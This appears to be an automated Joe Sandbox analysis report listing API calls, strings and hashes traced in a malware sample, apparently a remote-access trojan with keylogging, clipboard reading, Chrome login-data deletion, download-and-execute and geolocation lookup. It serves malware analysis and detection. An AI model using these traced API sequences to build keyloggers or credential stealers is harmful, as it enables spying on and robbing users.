                                                                                          • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                                                                          APIs
                                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00419407
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                                                                          Strings
                                                                                          • http://geoplugin.net/json.gp, xrefs: 004193A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                          • String ID: http://geoplugin.net/json.gp
                                                                                          • API String ID: 3121278467-91888290
                                                                                          • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                                                                          • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                                                                          • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                                                                          • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                                                                          APIs
                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                                                                          • GetLastError.KERNEL32 ref: 0040A999
                                                                                          Strings
                                                                                          • UserProfile, xrefs: 0040A95F
                                                                                          • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                          • API String ID: 2018770650-1062637481
                                                                                          • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                                                                          • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                                                                          • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                                                                          • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                          • GetLastError.KERNEL32 ref: 00415CDB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 3534403312-3733053543
                                                                                          • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                                          • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                                                                          • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                                          • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00408393
                                                                                            • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                                                                            • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                                                                            • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                                                                            • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                                                                          • FindClose.KERNEL32(00000000), ref: 004086F4
                                                                                            • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                                                                            • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                          • String ID:
                                                                                          • API String ID: 1824512719-0
                                                                                          • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                                                                          • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                                                                          • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                                                                          • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0040949C
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                          • GetKeyState.USER32(00000010), ref: 004094B8
                                                                                          • GetKeyboardState.USER32(?), ref: 004094C5
                                                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                          • String ID:
                                                                                          • API String ID: 3566172867-0
                                                                                          • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                                                                          • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                                                                          • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                                                                          • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                          • String ID:
                                                                                          • API String ID: 276877138-0
                                                                                          • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                                                                          • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                                                                          • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                                                                          • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                                                                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Find$CreateFirstNext
                                                                                          • String ID: H"G$`'G$`'G
                                                                                          • API String ID: 341183262-2774397156
                                                                                          • Opcode ID: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                                                                                          • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                                                                          • Opcode Fuzzy Hash: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                                                                                          • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                                                                          APIs
                                                                                            • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                            • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                            • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                            • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                            • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                          • String ID: PowrProf.dll$SetSuspendState
                                                                                          • API String ID: 1589313981-1420736420
                                                                                          • Opcode ID: 485f73e636cde54b00929bf3910efae957862298eb284d08d9347c6df5f92bed
                                                                                          • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                                                                          • Opcode Fuzzy Hash: 485f73e636cde54b00929bf3910efae957862298eb284d08d9347c6df5f92bed
                                                                                          • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0044F6B5
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0044F6DE
                                                                                          • GetACP.KERNEL32 ref: 0044F6F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                                          • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                                                                          • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                                          • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                                                          • wsprintfW.USER32 ref: 0040A13F
                                                                                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EventLocalTimewsprintf
                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                          • API String ID: 1497725170-248792730
                                                                                          • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                                                                          • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                                                                          • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                                                                          • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
• LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
• LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
• SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
Strings
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
APIs
• __EH_prolog.LIBCMT ref: 004087A5
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
• FindNextFileW.KERNEL32(00000000,?), ref: 00408846
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
APIs
  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
• GetUserDefaultLCID.KERNEL32 ref: 0044F8FC
• IsValidCodePage.KERNEL32(00000000), ref: 0044F957
• IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
• GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
• GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0044F9CD
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID:
• API String ID: 745075371-0
APIs
• __EH_prolog.LIBCMT ref: 0040784D
• FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
APIs
  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
• CloseHandle.KERNEL32(00000000), ref: 0040E4EF
  • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 1735047541-0
Strings
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID:
• String ID: A%E$A%E
• API String ID: 0-137320553
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
  • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
  • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
  • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
Strings
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
• IsValidCodePage.KERNEL32(00000000), ref: 0044EF9A
• _wcschr.LIBVCRUNTIME ref: 0044F02A
• _wcschr.LIBVCRUNTIME ref: 0044F038
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0044F0DB
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
APIs
• _free.LIBCMT ref: 004468EC
  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
• GetTimeZoneInformation.KERNEL32 ref: 004468FE
• WideCharToMultiByte.KERNEL32(00000000,?,0046F754,000000FF,?,0000003F,?,?), ref: 00446976
• WideCharToMultiByte.KERNEL32(00000000,?,0046F7A8,000000FF,?,0000003F,?,?,?,0046F754,000000FF,?,0000003F,?,?), ref: 004469A3
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
Strings
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: open
• API String ID: 2825088817-2758837156
APIs
  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                                          • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                                                                          • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                                          • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                                                                          APIs
                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                                                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1815803762-0
                                                                                          • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                          • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                                                                          • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                          • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(00000000), ref: 0040A65D
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0040A669
                                                                                          • CloseClipboard.USER32 ref: 0040A671
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2058664381-0
                                                                                          • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                                                                          • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
